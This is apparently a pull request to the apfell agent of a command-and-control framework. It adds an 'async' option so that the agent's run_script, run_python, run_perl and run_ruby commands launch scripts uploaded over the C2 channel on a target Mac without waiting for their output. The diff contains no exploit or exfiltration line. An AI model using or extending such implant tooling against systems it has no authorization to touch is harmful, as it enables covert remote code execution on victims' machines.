### PR TITLE
Add Asynchronous Parameter

### DIFF
--- a/Payload_Type/apfell/apfell/agent_code/run_script.js
+++ b/Payload_Type/apfell/apfell/agent_code/run_script.js
@@ -6,6 +6,8 @@ exports.run_script = function(task, command, params){
         let script = "";
         let args = [];
         let timeoutSeconds = 1800;
+        let synchronous = true;
+        let responsepy = "";
         if(config.hasOwnProperty("file")){
             let script_data = C2.upload(task, config['file']);
             if(typeof script_data === "string"){
@@ -13,7 +15,7 @@ exports.run_script = function(task, command, params){
             }
             script = $.NSString.alloc.initWithDataEncoding(script_data, $.NSUTF8StringEncoding);
         } else {
-            return {"user_output": "missing file parameter", "completed": true, "status": "error"}
+            return {"user_output": "missing file parameter", "completed": true, "status": "error"};
         }
         if(config.hasOwnProperty("interpreter")){
             program_path = config["interpreter"];
@@ -23,6 +25,9 @@ exports.run_script = function(task, command, params){
         }
         if(config.hasOwnProperty("timeout")){
             timeoutSeconds = config["timeout"];
+        }
+        if(config.hasOwnProperty("async")){
+            synchronous = !config["async"];
         }
         let inputData = script.dataUsingEncoding($.NSUTF8StringEncoding);
         // Prepare NSTask
@@ -47,6 +52,8 @@ exports.run_script = function(task, command, params){
         // Launch task
         script_task.launch;
 
+        // If synchronous start timeout and get output
+        if (synchronous) {
         // Start Timeout
         const start = $.NSDate.date;
         while (script_task.isRunning) {
@@ -72,7 +79,11 @@ exports.run_script = function(task, command, params){
         // Aggregate Response
         let response1py = ObjC.unwrap(outputString);
         let response2py = ObjC.unwrap(errorString);
-        let responsepy = response1py + response2py;
+        responsepy = response1py + response2py;
+        }
+        else {
+            responsepy = "+ Asynchronous Task Created +";
+        }
         return {"user_output":responsepy, "completed": true};
      }catch(error){
         return {"user_output":error.toString(), "completed": true, "status": "error"};

--- a/Payload_Type/apfell/apfell/agent_functions/run_perl.py
+++ b/Payload_Type/apfell/apfell/agent_functions/run_perl.py
@@ -58,7 +58,7 @@ class RunPerlArguments(TaskArguments):
             CommandParameter(   
                 name="async",     
                 cli_name="async", 
-                display_name="async",
+                display_name="Async",
                 default_value=False,
                 type=ParameterType.Boolean,
                 description="Run the script asynchronously without waiting for output. (Timeout will be ignored)",

--- a/Payload_Type/apfell/apfell/agent_functions/run_perl.py
+++ b/Payload_Type/apfell/apfell/agent_functions/run_perl.py
@@ -55,6 +55,26 @@ class RunPerlArguments(TaskArguments):
                     )
                 ]
             ),
+            CommandParameter(   
+                name="async",     
+                cli_name="async", 
+                display_name="async",
+                default_value=False,
+                type=ParameterType.Boolean,
+                description="Run the script asynchronously without waiting for output. (Timeout will be ignored)",
+                parameter_group_info=[ 
+                    ParameterGroupInfo(
+                        required=False,
+                        group_name="Default",
+                        ui_position=2
+                    ),
+                    ParameterGroupInfo(
+                        required=False,
+                        group_name="Existing File",
+                        ui_position=2
+                    )
+                ]
+            ),
         ]
 
     async def parse_arguments(self):

--- a/Payload_Type/apfell/apfell/agent_functions/run_python.py
+++ b/Payload_Type/apfell/apfell/agent_functions/run_python.py
@@ -58,7 +58,7 @@ class RunPythonArguments(TaskArguments):
             CommandParameter(   
                 name="async",     
                 cli_name="async", 
-                display_name="async",
+                display_name="Async",
                 default_value=False,
                 type=ParameterType.Boolean,
                 description="Run the script asynchronously without waiting for output. (Timeout will be ignored)",

--- a/Payload_Type/apfell/apfell/agent_functions/run_python.py
+++ b/Payload_Type/apfell/apfell/agent_functions/run_python.py
@@ -55,6 +55,26 @@ class RunPythonArguments(TaskArguments):
                     )
                 ]
             ),
+            CommandParameter(   
+                name="async",     
+                cli_name="async", 
+                display_name="async",
+                default_value=False,
+                type=ParameterType.Boolean,
+                description="Run the script asynchronously without waiting for output. (Timeout will be ignored)",
+                parameter_group_info=[ 
+                    ParameterGroupInfo(
+                        required=False,
+                        group_name="Default",
+                        ui_position=2
+                    ),
+                    ParameterGroupInfo(
+                        required=False,
+                        group_name="Existing File",
+                        ui_position=2
+                    )
+                ]
+            ),
         ]
 
     async def parse_arguments(self):

--- a/Payload_Type/apfell/apfell/agent_functions/run_ruby.py
+++ b/Payload_Type/apfell/apfell/agent_functions/run_ruby.py
@@ -58,7 +58,7 @@ class RunRubyArguments(TaskArguments):
             CommandParameter(   
                 name="async",     
                 cli_name="async", 
-                display_name="async",
+                display_name="Async",
                 default_value=False,
                 type=ParameterType.Boolean,
                 description="Run the script asynchronously without waiting for output. (Timeout will be ignored)",

--- a/Payload_Type/apfell/apfell/agent_functions/run_ruby.py
+++ b/Payload_Type/apfell/apfell/agent_functions/run_ruby.py
@@ -55,6 +55,26 @@ class RunRubyArguments(TaskArguments):
                     )
                 ]
             ),
+            CommandParameter(   
+                name="async",     
+                cli_name="async", 
+                display_name="async",
+                default_value=False,
+                type=ParameterType.Boolean,
+                description="Run the script asynchronously without waiting for output. (Timeout will be ignored)",
+                parameter_group_info=[ 
+                    ParameterGroupInfo(
+                        required=False,
+                        group_name="Default",
+                        ui_position=2
+                    ),
+                    ParameterGroupInfo(
+                        required=False,
+                        group_name="Existing File",
+                        ui_position=2
+                    )
+                ]
+            ),
         ]
 
     async def parse_arguments(self):

--- a/Payload_Type/apfell/apfell/agent_functions/run_script.py
+++ b/Payload_Type/apfell/apfell/agent_functions/run_script.py
@@ -95,6 +95,26 @@ class RunScriptArguments(TaskArguments):
                     )
                 ]
             ),
+            CommandParameter(   
+                name="async",     
+                cli_name="async", 
+                display_name="async",
+                default_value=False,
+                type=ParameterType.Boolean,
+                description="Run the script asynchronously without waiting for output. (Timeout will be ignored)",
+                parameter_group_info=[ 
+                    ParameterGroupInfo(
+                        required=False,
+                        group_name="Existing File",
+                        ui_position=4
+                    ),
+                    ParameterGroupInfo(
+                        required=False,
+                        group_name="New File",
+                        ui_position=4
+                    )
+                ]
+            ),
         ]
 
     async def parse_arguments(self):

--- a/Payload_Type/apfell/apfell/agent_functions/run_script.py
+++ b/Payload_Type/apfell/apfell/agent_functions/run_script.py
@@ -98,7 +98,7 @@ class RunScriptArguments(TaskArguments):
             CommandParameter(   
                 name="async",     
                 cli_name="async", 
-                display_name="async",
+                display_name="Async",
                 default_value=False,
                 type=ParameterType.Boolean,
                 description="Run the script asynchronously without waiting for output. (Timeout will be ignored)",


### PR DESCRIPTION
Updated the run_ruby, run_perl, run_python, and run_script commands to include a boolean toggle allowing the scripted content to be executed asynchronously. Create a new task and then immediately return without hanging Apfell.